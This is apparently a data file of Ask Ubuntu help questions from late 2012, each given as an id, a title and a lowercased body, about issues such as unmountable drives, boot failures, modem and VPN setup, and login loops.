231639	ca n't mount 2nd hd sfs	i 'm trying to mount a 1tb western digital hd that was appearing fine yesterday before i reinstalled ubuntu 12.04 . i used to have a dual boot windows 7/ubuntu 12.04 , and my 1tb drive would show up fine from either os . today , i wiped my boot drive in order to use it all for ubuntu 12.04 , i.e. , remove windows 7 , and now i 'm trying to mount the 1tb drive to /media on my new installation without much success . here is the fdisk output for the device i 'm trying to mount : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f25ce66 device boot start end blocks id system /dev/sdb1 * 63 1953523119 976761528+ 42 sfs i tried running sudo mount /dev/sdb /media , i get : mount : you must specify the filesystem type if i try to run sudo mount -t sfs /dev/sdb /media , i get : mount : unkown filesystem type 'sfs' i also tried mounting as ntfs , ntfs-3g , and a few other types , but of course it says 'device does n't seem to have a valid ntfs ' etc . how can i mount this hd ?
231642	installed auto update to ubuntu 12.10 and now the destop does not load	i updated ubuntu 12.10 using the update manager , and now the desktop will not load . i tried to remove nvidia-current and reinstall it through various methods suggested on the web , but the operation always fails at line 33 in /var/lib/dpkg/info/nvidia-current.postrm with the message : /usr/sbin/update-initramfs is not found i tried to remove and reinstall initramfs-tools but it would not let me do so . i 'm running the commands as `` sudo '' user . can anyone help as i 'm a novice to ubuntu ?
231643	mame , metal slug , and neo geo	i am trying to play metal slug in mame . i have both mslug.zip and neogeo.zip , both showing up in the games list , but when i try to run metal slug , it says i am missing one or more required files . please help ? thanks .
231646	does ubuntu support retina displays ?	there was a discussion in summer that ubuntu does not support retina displays - everything on the screen is too small . even adjusting dpi does not help , since such an adjusting scales only fonts , bit not images . is ubuntu 12.10 already optimized for retina displays . if not is it planned for ubuntu 13.04 ?
231647	dual booting ubuntu 12.04 and windows 7 ( partitioning scheme )	i would like to ask for help on dual booting because it 's my first time to try dual booting and a novice on ubuntu or any linux distribution . i have 2 partitions on my hard disk : windows 7 c : \ windows 7 ( pre-existing installation ) d : \ files ( already exists and has files already ) please help me on the partitioning part . can i shrink any of the 2 partitions i have ? i know that there should only be 4 primary partitions on 1 hard disk . then how would i be setting the root , swap , and /home . would that mean i will end up with 5 partitions when only 4 partitions are allowed . i 'm really confused . please bear with me .
231649	computer hangs when trying to start software center	every time i want to open software center to install something , my computer hangs before it starts . what could be the problem ? and when i try sudo apt-get update and type my password , in the end of that i get error : w : gpg error : http : //repo.steampowered.com precise inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey f24aea9fb05498b7 edit when i run software-center command from terminal , it does not give any errors , only thing it writes in output is : fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . 2012-12-23 15:55:18,554 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-12-23 15:55:19,000 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true and after that it stays that way ...
231653	suspending the current ssh connection	i 'm new to ubuntu and trying to learn ssh connections . i learned trick to suspend the current ssh connection and come back to localhost using : ~ + ctrl-z when i press shift+~ , i suppose that the ~ should n't be visible until i press ctrl-z ( which makes my ssh connection to be suspended and come back to localhost ) . however at times it works as expected i.e ~ is not visible until i press ctrl-z . but at times ~ is been visible at terminal once i press the shift+~ keys , which makes the suspending ssh impossible ! am i missing something here . thanks in advance .
231656	open all files in project with long lines in an editor	i 'd like to edit all text files under a certain directory that have one or more lines that are over a certain threshold in length . how can i do that ? to keep things simple , let 's assume that all the text files in the directory and its subdirectories have the same file extension - let 's say .java . p.s . my editor of choice is emacs .
231660	how re-map the shortcut key in terminal	according to the gnome-termianl usage , i found that ctrl+shift+up/down can scroll up/down a line in the terminal . now , i want to re-map the shortcut key , just like : shift+j/k to up/down a line , that 's the old habit of vimer . : ) i tried searching the settings in edit - > keyboard shortcuts of terminal , but found nothing . can anyone help me ? thanks in advance . the information of my computer : $ cat /etc/issue ubuntu 12.10 \n \l
231664	what is the best practice to run applications having gui written to kde ( like kdenlive , for example ) ?	here are three scenarios how can i use such applications with kde specific gui : have separate distro for them , kubuntu , for example . install kde plasma desktop in ubuntu and start kde session when i need to use kdenlive install kdenlive in ubuntu with all dependencies ( which includes kde libs ) and start it from unity . what is most rational ?
231665	install bsnl evdo card in ubuntu 12.10	i want to install bsnl evdo rev a usb data card model no . : t-u500 on my laptop which is double booted with both ubuntu and windows 7 . bsnl evdo works well on windows 7 and i tried to install it on ubuntu . i do n't have internet connection in ubuntu . i tried to install using terminal at @ at-presario-v3700-notebook-pc : ~ $ sudo modprobe usbserial vendor=0x15eb product=0x7153 at @ at-presario-v3700-notebook-pc : ~ $ sudo wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 ... ttyusb0 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial two : then i tried to follow http : //linuxers.org/howto/how-configure-bsnl-evdo-linux and after i typed wvdial i am getting error /etc/wvdial.conf i edited to : [ dialer defaults ] modem=/dev/tty0 baud=115200 dial command = atdt baud=115200 dial command = atdt init1=atz init2=at+crm=1 flow control= hardware ( crtscts ) username = 9180326472 password = 9180326472 phone = # 777 stupid mode = 1 resolv.conf i edited to hash dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) hash do not edit this file by hand -- your changes will be overwritten nameserver 218.248.240.181 nameserver 208.67.220.220 ( by hash i mean # ) what i typed in terminal : root @ at-presario-v3700-notebook-pc : ~ # vim /etc/wvdial.conf root @ at-presario-v3700-notebook-pc : ~ # vim /etc/resolv.conf root @ at-presario-v3700-notebook-pc : ~ # wvdial -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz -- > sending : atq0 -- > re-sending : atz -- > modem not responding . root @ at-presario-v3700-notebook-pc : ~ # after doing all this i logged into windows , uninstalled it , unplugged the modem , plugged it again , clicked `` open folder to view files '' , clicked linux , copied `` bsnl evdo installer '' to the desktop . then i logged onto ubuntu moved the file into its desktop and installed it . after installation i clicked `` evdo data card '' but nothing happened . what should i do ? is the problem caused by something i did above ?
231666	how do i setup an lxc guest so that it gets a dhcp address so i can access it on my network ?	i setup lxc using : lxc-create -t ubuntu -n lxcguest1 but i ca n't access any services running on it from my lan , it appears to be nated . how do i set it up so that i can access it ( it probably needs to get it 's dhcp address from my linksys router ) ? thanks .
231667	`` can not access archive : no such file or directory '' when installing a package using dpkg	i have download the qq2012 's deb in downlaod files , but when i install the deb , system tell me : collins @ collins-aspire-3830tg : ~ $ sudo dpkg -i wineqq2012-20120719-longene.deb [ sudo ] password for collins : dpkg : error processing wineqq2012-20120719-longene.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : wineqq2012-20120719-longene.deb
231668	windows 8 guest , ubuntu 12.10 host - sound will only play through front headphone jack	i 've had a search but could n't find a solution for my issue . i 'm running ubuntu 12.10 with vmware player 5.0.1 build-894247 . unbuntu is recognising my sound card as a `` creative labs ca0106 soundblaster '' and sound functions as you would expect from within . ( sound plays from main speakers with no issues ) . within vmware i 've got a new copy of windows 8 enterprise with vmware tools installed , the sound card gets detected and the guest reports no issues with hardware . at this point i noticed i 'm not getting any sound from within the vm , i 've been scratching my head for hours until i thought to try headphones in the front jack on the computer . it turns out that sound has been working all along from within windows 8 / vmware however for some reason it is `` playing '' through the front headphone jack regardless of if it is in use or not . has anyone else come across a similar issue or does anyone have any advise on how to resolve this ? many thanks ! j tl ; dr - sound from win 8 guest plays through headphone jack instead of speakers
231669	ubuntu 12.10 hangs on installation	i have ubuntu on my usb drive . it boots after i select boot from usb drive . it shows me the option to choose to try or install . whenever i choose either , it asks me to log into my wifi which i do and then when i select continue ... nothing . ( even when i avoid using wifi ) . when i use ctrl+alt+del to restart , it says `` the application compiz has closed unexpectedly '' . it gives me the option to relaunch which i do and another error message pops up that says `` ... send bug report ... '' which i do . i get a blank ubuntu screen . again using ctrl+alt+del , i get a popup that says i 'm logged in as a live user session . if i cancel the popup , i 'm still stuck with the ubuntu screen . if i select log out , i get the ubuntu log in screen requesting username and password ? ( i did n't even get to the part where i typed a username and password so at this point i do n't know what to type in . i tried blank username and blank password plus other various combinations i could think of and nothing . ) the computer currently runs linux so i 'm trying install ubuntu since linux wont recognize my sound drivers and network card . any help would be appreciated . i just want to install ubuntu from a bootable usb drive since i have a cd rom drive without any cdrs or cdrws . tomorrow , i 'm going to try a different ubuntu version . excuse the wordiness .
231671	ca n't boot ubuntu 12.10 from usb key on dell inspiron 15r 5520 ( 2012 model )	i 'm new in the linux community and thus , i wanted to try ubuntu 12.10 by using a usb flash drive boot ( used with lili creator ) . i installed the iso file using lili creator on the usb key , but when rebooted my system , the usb drive did n't show up on the boot menu ( f12 ) , the usb key is just not there . i use windows 8 single language and the system bios has two options uefi and legacy but those settings did n't help me booting from usb drive . the usb emulation is enabled fyi , one last thing : i do n't know more settings and dell community also dose n't have particular answer , please help me . my config : dell inspiron 15r 5520 laptop ( 2012 ) intel core i5 3rd gen @ 2.5ghz 4gb ram intel hd 4000 graphics , windows 8 single language 64bit award bios a11 ( i think i updated it to a11 ) transcend jetflash 2gb for installing ubuntu 12.10 with lili creator thanks in advance : ) rutul
231681	can i verbose output during a copy command processing ?	situation : if i entered a copy command like cp -rf /src/ /dsc/ then i am waiting several minutes for copy large directories . i forgot to put -v flag to verbose an output , can i do it during copying ?
231682	program for context indexed search in desktop	is there any app similar to google desktop ? i need to find files with key words that are source files or *.doc ( x ) /odt documents .
231686	wifi problems acer aspire m3 ubuntu 12.04	i recently installed ubuntu 12.04 on my new acer aspire timeline ultra m3-481t-53314g52mass and everything works fine except the wifi . the connection always drops down after a few minutes . i saw some threads with similar questions , but nothing really helps me . would be great to get an answer here . best regards
231694	how to install limbo under wine in ubuntu 12.04 64 bit edition ?	i just bought a new laptop and installed ubuntu 12.04 64 bit edition on it . i 'm trying to play limbo 1.0.0 , but it does n't start . i installed directx9 using winecfg , but nothing . any help ? my videocard is a amd radeon hd 7670m . wine version : 1.5.19
231695	how do i open ubuntu software center via terminal ?	i am a newbie in linux and i do n't know how to open the ubuntu software center via terminal ! ! please help
231700	ubuntu 12.10 very slow boot up	i do n't know why but when i power up my system ubuntu starts very slow and after waiting for 15 minutes it only gives me the terminal.. if then i power it down , and turning the computer back on it boots normally . here is an example of a normal boot : http : //uppix.net/8/e/f/d16b07381b7cc3473572554211075.png and this is the unusual boot : http : //uppix.net/9/6/2/8a5dd533046bda79958c6ace8c533.png any help on how to fix this ? my system : 2gh centrino 2 , 4gb ram , 9650 nvidia m gt .
231702	ubuntu login screen changed to kde	i use ubuntu , with different desktop enviroments . i had kde for a while and after a week , suddenly my login screen changed to the look of kde . there is only one problem : in the ubuntu login screen , your account name already is selected , but in kde login screen it does n't show up , you need to write it all yourself . now my username does n't work , so i ca n't login into ubuntu and i do n't want to re-install . what can i do ? i use ubuntu 12.10 with dual boot windows 8 . desktop enviroments : kde , unity , cinnamon , gnome .
231705	pidgin tray icon disappears after switching to full-screen application . bug or ... ?	i 'm not sure if anyone has the same problem . it can be a problem of my own system , as i did n't find any signs of it in google , that 's why i 'm not sure if it 's worth a bug report . preconditions : pidgin is added into tray whitelist ; showing mode `` always '' in enabled for tray icon . i 'm running ubuntu 12.10 with unity , pidgin v.2.10.6 . my actions : 1 ) verify that pidgin icon is visible in tray . 2 ) open a full-screen application ( in my case , those were wine or smplayer ) 3 ) switch back to any non-full-screen app using alt-tab . and the pidgin icon disappears from the tray . to enable it again , i switch 'show icon in tray ' property to any other mode , and then back to 'always ' . can anyone reproduce this problem ? what configuration files and/or logs should i look into ? thank you !
231707	display problems with google chrome on ubuntu	i 'm experiencing problems with quite some webpages while using google chrome ( stable build : 23.0.1271.97 ) . many websites like facebook , youtube , arstechnica not rendering as they should , also this problem is happening only in google chrome , and not in mozilla firefox . here are some screenshots : i tried disabling accelerated 2d canvas , css animations and gpu compositing on all pages . even tried doing this : google-chrome -- blacklist-accelerated-compositing all suggested here , but it did n't help . list of all plugins installed - please help me in fixing this , any help would be appreciated .
231710	why ca n't i restore grub after installing windows ?	recently i restored windows to default using the acer restore partition and when i restarted , as to be expected , it bypassed grub and went straight into windows . now when i try and restore grub it still boots into windows . the boot repair tool says that it is fixed , but i beg to differ and it gives this report . any suggestions ?
231711	font rendering in gedit is smooth , but not smooth in netbeans	see the attached image . the window in the background is gedit with the fonts rendered smooth . the window on top is netbeans with not-so-smooth font rendering ( not anti-aliased , i think ) . both editors use ubuintu mono font . can anyone help me to make netbeans render the fonts better ? i 'm on 12.10 .
231719	how do i install ubuntu on a computer without an os on it ?	i 'm trying to installing windows 8 consumer preview on my laptop , but it does n't work . so now i have no operating system in my laptop , and i 'm trying to install ubuntu on my laptop , but how ?
231724	grub-install /dev/sda failed this is a critical error	i get this error `` grub-install /dev/sda failed '' when i 'm installing ubuntu 12.10 64-bit on a new pc ( on a dvd ) i am new to linux and any advice would he helpful . system specs : gigabyte ga-a75m-ud2h amd athlon ii x4 ( fm1 ) 2x powercolor radeon hd 6870 4x crutial m4 64gb ssd ( no that 's not a joke ) 8gb corsair 1333mhz ram ( fm1 limitation ) liteon dvd burner
231726	how do i use the partition table in ubuntu 10.10 ?	i want to install ubuntu 10.10 on my macmini first gen ( snow leopard ) , my imac g3 ( tiger ) , or my powerbook g4 ( tiger ) . but i still want my mac os x on it . i ca n't use the disk utility to partition my drives . even though my macmini runs snow leopard the disk utillity says that i need 10 gb of free space even though i have way more then that . i tried using the ubuntu 10.10 partition table to partition my computer ( s ) with it . but i ca n't figure out how to use it . please help ! ! !
231727	fastboot gets stuck while sending userdata image ( raring preinstalled ) to nexus 7	i am trying to install the latest pre-installed image of ubuntu on my nexus 7 . however , i am stuck at flashing the userdata image . i have all my drivers and android sdk updated . having said that , this seems like a image size issue . i read elsewhere on the internet ( here actually ) , that there is a size limitation on flashing 'userdata ' partition ; which is max 700mb . this is interesting , because the size of raring-preinstalled-desktop-armhf+nexus7.img shows up as 690mb , however , when flashing it , fastboot quotes it as 705701 kb . i suspect that this could be a problem , because the previous version 12.xx was less than 700000 kb and hence i was able to easily flash it . any help is appreciated on how to flash this new version , or whether i should flash the old version and upgrade it . some info on the devices : nexus 7 16gb host os : ubuntu 12.04.1 update : initially i was following the manual install instructions from ubuntu nexus 7 wiki . while flashing gunzipped image raring-preinstalled-desktop-armhf+nexus7.img , fastboot showed the size as 705701 kb and consistently went to disk sleep . however , today i tried the installer script ( ubuntu-nexus7-installer ) and the fastboot flash was successful . this time fastboot showed the size as 692481kb i am going to file this as a bug instead and close this question .
231732	how to change unity launch application to wiggle ?	is there any easy way to use the wiggle animation ( which is used to indicate urgent program ) as the animation for launching application instead of the pulsing way ?
231736	ubuntu 12.10 boot hangs at purple screen when integrated nic ( ethernet card ) is enabled in bios	here 's my weird problem , with a uefi ubuntu 12.10 64 bits installation on an inspiron 14z ultrabook with an integrated atheros ar8162 ethernet card ( nic ) . if the ar8162 card is enabled in bios , ubuntu wo n't load , as it will hang in a blank purple screen or , in recovery mode , at `` loading initial ramdisk '' . if the ar8162 card is disabled , it will boot just fine . the problem is that i need an ethernet connection ... what is strange is that i 'm able to boot ubuntu in legacy mode with the ar8162 enabled in bios and this card is working just fine with the alx module available in compat-wireless package ( see : 12.04 does not detect eth0 ( atheros ar8162 ) ) . the only thing is that i want to keep dual booting with win8 , so uefi grub installation is mandatory . any idea someone on how to boot ubuntu 12.10 in uefi mode , with a working ar8162 card ? thanks .
231743	mouse cursor lag after lock screen , 64 bit 12.04	recently i have noticed that when i return to my computer after it has been `` locked '' for a while , the mouse pointer has significant lag . the cursor position appears to only update a few times a second . moving the mouse results in the pointer `` following '' the movement in a jerky kind of way , and then continuing for some fraction of a second after i have stopped using the mouse . replacing the mouse has no effect . ( i have two differently branded and constructed usb optical mice ) . plugging either mouse into a different usb port has no effect . once the problem was resolved by `` suspending '' the system , and then re-starting it with the power switch , but this does not work every time . so far , the only fool-proof fix is to shut the system down and re-start it ( re-boot ) . i have tried this suggested fix . it had no effect .
231745	how do i install hp 620 laptop graphics driver ?	on the intel site there is no mobile intel gma 4500mhd driver for linux . they link this site though http : //www.intellinuxgraphics.org/ claiming to develop such a driver . there are no ubuntu packages there or any file that i could install . can anyone help ?
231751	unity ( compiz ) does n't work with xinerama and amd gpus	using 2 amd gpus to power 3 monitors , when i enable xinerama and reboot unity does n't open . i am using the 12.11 beta drivers from ati and 12.10 version of ubuntu . here is a log using the unity -- reset command . http : //pastie.org/pastes/5565331/text the log mentions several files it ca n't find and ends with : compiz ( core ) - fatal : no composite extension i 've tried using kde and gnome classic and xinerama is working well there . however using compwiz -- reset in those window manager results in the same compiz ( core ) - fatal : no composite extension error . so that ca n't be why xinerama is n't working , right ? any help here would be appreciated . multi monitor support is crucial : (
231755	quake live under firefox 17 , ubuntu 12.10	i 've got the following problem , i am trying to start quake live on firefox 17 under ubuntu 12.10 . i downloaded the plugin , which installed correctly , downloaded some maps ... but when i try to start the game , i can only hear some garbled music and that 's all . i can not see anything from the game , like if the plugin has crashed . before anyone tries to say this is a clone , no it 's not . how do i play quake live ? does n't even come close to my problem ... also , it seem that windows and firefox combination work for some people . my question is : 1 ) does anyone has a quake live running , at least on firefox 17 ? 2 ) if not , where should i start digging to check the logs/debug to see what 's actually going on ?
231757	screenshot tools to capture scrolling windows	as the title of the question states , i want to know what are the tools available for ubuntu which would allow me to take screenshots of `` scrolling windows '' ie ; tall webpages , tall nautilus window which contains lots of files and folders etc . as a single image file . for the sake of clarity , i have already seen this question . however , i am specifically looking for tools to capture scrolling windows . as an example , my personal favorite for microsoft windows is duckcapture . it 's light on resources and helps me take beautiful screenshots . is there anything close to it available for ubuntu ?
231769	how do i get an idea 3g net setter working ?	i wanted to install my idea 3g net setter in ubuntu 12.04 lts . but the autoplay is not working . i 'm new to terminal commands.. so please guide me through it .
231772	ca n't update system due to `` error in validating some packages . ''	i have a little problem updating my ubuntu . i have not update it for a while and i tried today . the problem is that i tried 3 time , and there is the same problem . the problem says something like this : `` error in validating some packages . could not authenticate some packages . this may be due to temporary network problems . you can try later . beneath you have a list of the packages that could not authenticate . '' and there are a lot of packages .
231773	how do i access my d-link share center nas ?	newish to ubuntu , installed 12.10 yesterday and am trying to access my dlink share center ( nas ) on my home network . when i go to browse network , it shows up but will not access my files because it 's `` unable to mount location '' failed to retrieve share list from server - is the message . can some one point me to a tutorial on how to set this up ? i figure i need to do something with samba but am a little rusty with that , and would like it to auto mount at bootup of computer thanks !
231777	how to add applications to the messaging indicator in ubuntu 12.10 ?	i would like to add applications as lightread or polly to the message indicator . how can i do this ? the only information i found does not support ubuntu 12.10
231778	how do i get the scanner to work on a samsung scx 4521f multi function printer ?	how do i get ubuntu ti scan documents with a scx 4521f . it is installed as a printer but simple scan says not detected ,
231779	how to share architecture-independent latex files across multiple setups	i have 3 ubuntu computers , 2 of them running 32-bit and one 64-bit . i want to install latex and texmaker on all of them . however , the downloads are pretty large and i do n't want to unnecessarily download the same files over again , so is there anyway i can download the common files once and share them among the three computers . any help will be highly appreciated and thanks in advance . : )
231780	server drops all network connections from other hosts during samba file copy from gigabit clients	i have a vanilla install of ubuntu server 12.10 running on an old p4 pc with 512mb ram and a 10/100 nic . default samba config , with a simple share defined as follows : [ public ] comment = ubuntu file server share path = /srv/samba/share browsable = yes guest ok = yes read only = no create mask = 0755 as stated in the title , here are the symptoms of this strange problem : when i copy files to ( important ) the server from windows hosts that are connected to the network via gigabit ethernet ( important ) , the server appears to be no longer available to other machines on the network . for the duration of the file copy operation , other hosts can not ping the server , ssh to the server or see the server on the network in any way . once the file copy operation is complete , the server is again available on the network and all other clients can connect to it the file copy always succeeds , no timeout issues or file corruption the host that is copying the file is still able to make other connections to the same server ( icmp , ssh , etc ) the file copy runs at pretty much max throughput for the 10/100 nic all non wireless clients are connected via a gigabit ethernet switch there are no suspected hardware issues with the pc at this time note copying large files from the server to the windows hosts ( gigabit or otherwise ) does not exhibit any of the above symptoms copying large files to the server from 802.11n wireless clients or 10/100 clients does not exhibit any of the above symptoms troubleshooting steps so far ( always same symptoms as above ) tried a different 10/100 nic in the server ( completely different brand ) installed ubuntu 10.04.4 lts ( lucid lynx ) moved nic to different pci slots tried a different brand of gigabit ethernet switch tried different network cables i know this a pretty specific and isolated problem , but i thought i 'd ask in case someone has seen this before .
231784	log in fails and returns to log in screen	i am running a very nearly fresh gnome version of 12.10 , with no particular tweaks or customisation . i performed an upgrade yesterday using sudo apt-get update ; sudo apt-get upgrade which completed successfully . after rebooting , i find that i am no longer able to log in - entering my ( correct ) password brings up a black terminal for a couple of seconds as usual and then returns me to the login screen . so far : the guest account can log in fine i can log in to a terminal via ctrl+alt+1 etc deleting all my gnome profile entries ( .gnome , .gnome2 , .gconf , etc ) does not help a new empty user ( created using $ sudo adduser newguy ; sudo passwd newguy ) has the same problem /var/log/syslog has some odd messages including gdm-simple-slave [ 1219 ] : warning : child process -1838 was already dead warning : failed to give slave programs access to the display . trying to proceed i installed kde-standard and had the same problem , so it is not a gnome issue running startx from the terminal available through ctrl+alt+1 brings me to a working desktop . if this is allowed to go to screen-saver or is locked , i am unable to wake it ( i get an `` authentication error '' message below the password entry field ) . opening a terminal in a guest session , running su - myusername and entering my password and gives the error setgid : operation not permitted i surmise that something about the ubuntu login is broken , at least on my system . any suggestions will be most gratefully received ...
231785	how do i install ubuntu on an hp dv6-7206 tx notebook ?	i am trying to install ubuntu 12.04 on new hp notebook nb pc dv6-7205 tx . this notebook comes with windows 8 preloaded . itried to install ubuntu 12.04 but while rebooting the boot loader does not show both the operating systems and second thing is if only ubuntu is loaded on this laptop i do n't know how to configure wireless/bluetooth is there any step by step guide available .
231794	i boot my usb and the copyrights details show but i can not go anywhere from there ?	i plug in my usb and turn my computer and then the copy rights come on the screen . it then says it can not find the configuration file and i can not do anything from there on . it is important to note i did use the universal usb thing and this appeared after i sued that and tried to boot the usb . any help would be appreciated , thanks .
231795	ubuntu does n't come up after installation	i have downloaded the iso file and put it on a flash drive . after that i booted from the flash drive and the normal ubuntu installation screen popped up . i clicked install now and it did everything right , but once i rebooted it will not come up . why is this ?
231796	touchscreen woes : attempt to scroll using touchscreen is recognized as a click and drag/select	i am running ubuntu 12.10 on a hp envy 4t-1105dx with touchscreen . everything except wifi ( atheros ar9565 does n't work out of the box ) and touchscreen ( mostly working ) works . i believe that the envy i have has an atmel maxtouch digitizer . when i 'm on firefox and certain other programs , attempting to scroll using the touchscreen si recognized as a click and drag/select motion as if i were holding down the mouse button to drag and highlight something . using the scroll bar on the side works . drag scrolling in documents viewer works . another problem is that while clicking generally works on the touchscreen , when i try to click folders or files using the touchscreen in nautilus , the file/folder is only highlight . besides this problem using the touchscreen is fine save for the lack of gestures in gnome shell . utouch is not in 12.10 anymore sadly . why i have no idea .
231798	usb stick wo n't boot	so i wanted to play around with chrome os , and installed the vanilla version of chromium os to my trusty usb stick . i used the win32diskimager.exe to install the os to the usb stick . all went well , but i decided i did n't really want to use the os , so i formatted the usb stick in windows using the minitool partition wizard . i finished with that and downloaded opensuse , and then installed it with your normal linux live usb creator . that 's when everything got screwy . it would n't boot after that . files could be copied to the stick , but it 's not bootable anymore . i tried unetbootin after that with the same result , and then one last time with the generic live usb creator from linuxpendrive.com . any idea what could have happened ? was it the win32diskimager that toasted the usb stick ? and is there any way to get back to a bootable state ? i was thinking of booting into gparted and formatting from there to see what would happen if i formatted through linux instead . ( oh , i should mention i tried a regular good 'ol format through windows 7 as well . any help would be appreciated .
231802	access violation in wine	i am using ubuntu 12.04 and wine version 1.5 . whenever i am trying to install boxoft pdf to flash converter it gives an error of - access violation at address 00409a0e . write of address 00400000 . what to do to install this . is it that some dll is missing or something . kindly help .
231805	limit which packages can be installed through a ppa	is it possible to add a ppa but limit what can be installed through it . let us say there 's a ppa with two packages and i 'm interested in one package but not the other . is it possible to add the repository while telling apt to ignore the second package ?
231807	openvpn fails with invalid secrets	i followed these set of instructions : https : //www.ipredator.se/guide/openvpn/ubuntu/gnome but unfortunately , when i connect it fails saying that invalid secrets are the cause . i 'm quite sure that my credentials are correct , and network-manager has definitely been restarted . the syslog output have is here : dec 22 11:36:13 desktop-1 networkmanager [ 972 ] : vpn service 'openvpn ' started ( org.freedesktop.networkmanager.openvpn ) , pid 3215 dec 22 11:36:13 desktop-1 networkmanager [ 972 ] : vpn service 'openvpn ' appeared ; activating connections dec 22 11:36:13 desktop-1 networkmanager [ 972 ] : vpn plugin state changed : 1 dec 22 11:36:13 desktop-1 networkmanager [ 972 ] : vpn plugin state changed : 3 dec 22 11:36:13 desktop-1 networkmanager [ 972 ] : vpn connection 'ipredator-openvpn ' ( connect ) reply received . dec 22 11:36:13 desktop-1 nm-openvpn [ 3219 ] : openvpn 2.2.0 i686-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on jul 4 2011 dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : ( wlan0 ) : ip6 addrconf timed out or failed . dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) scheduled ... dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) started ... dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) started ... dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) complete . dec 22 11:36:14 desktop-1 networkmanager [ 972 ] : activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) complete . dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : warning : file '/home/desktop/vpn/ipredator.se.ta.key ' is group or others accessible dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : control channel authentication : using '/home/desktop/vpn/ipredator.se.ta.key ' as a openvpn static key file dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : lzo compression initialized dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : resolve : note : pw.openvpn.ipredator.se resolves to 10 addresses dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : udpv4 link local : [ undef ] dec 22 11:36:14 desktop-1 nm-openvpn [ 3219 ] : udpv4 link remote : [ af_inet ] xxx.xxx.xxx dec 22 11:36:16 desktop-1 nm-openvpn [ 3219 ] : [ pw.openvpn.ipredator.se ] peer connection initiated with [ af_inet ] xxx.xxx.xxx dec 22 11:36:19 desktop-1 nm-openvpn [ 3219 ] : auth : received auth_failed control message dec 22 11:36:19 desktop-1 nm-openvpn [ 3219 ] : sigterm [ soft , auth-failure ] received , process exiting dec 22 11:36:19 desktop-1 networkmanager [ 972 ] : vpn plugin failed : 0 dec 22 11:36:19 desktop-1 networkmanager [ 972 ] : vpn plugin state changed : 6 dec 22 11:36:19 desktop-1 networkmanager [ 972 ] : vpn plugin state change reason : 10 dec 22 11:36:19 desktop-1 networkmanager [ 972 ] : error disconnecting vpn : could not process the request because no vpn connection was active . dec 22 11:36:19 desktop-1 networkmanager [ 972 ] : policy set 'wireless ' ( wlan0 ) as default for ipv4 routing and dns . dec 22 11:36:25 desktop-1 networkmanager [ 972 ] : vpn service 'openvpn ' disappeared
231809	no upgrade for 2 weeks	hello i 've been using ubuntu for 2 years now . and every 1 or 2 days i had something to upgrade . but today it 's been maybe 2 or 3 weeks since the system detected the last upgrade to do . i think something goes wrong with my xubuntu . what i did : 1/ in synaptic i chose the repositories : main , universe and i chose the `` main server '' to download from . 2/ then in a terminal : sudo apt-get update sudo apt-get upgrade and i always have 0 new package to install ... do you have the same `` trouble '' ? it 's very strange . thanks for your help
231812	swap never used . should i delete it ?	i have an extended partition with 32gb assigned , 4.3gb goes to swap and the rest is formated as ext4 . from time to time i open the system monitor and every time i see that swap is never used . should i delete swap in this case ?
231815	built-in camera not working ubuntu 12.04 + lenovo ideapad y400	i have problems with my built-in camera , i 've been looking at . it does n't work with cheese nor any other programs and it worked fine with windows . the programs recognize the cam as lenovo easycam but they are not able to use it . i think it 's the acer device of the lsusb output . any ideas ? j @ j : ~ $ ls /dev/video* /dev/video0 j @ j : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 8087:07da intel corp . bus 004 device 002 : id 5986:0525 acer , inc thank you ! ! !
231818	installing ubuntu , it can not find the root file ?	when i am installing ubuntu 12.04 , it takes me to a screen where i can partition my harddrive , so let 's say sda1 is my windows , sda2 is something else and sda3 is something else . whenever i click install on one of them with any boot loader option it gives me it says , it can not find the root system file ,
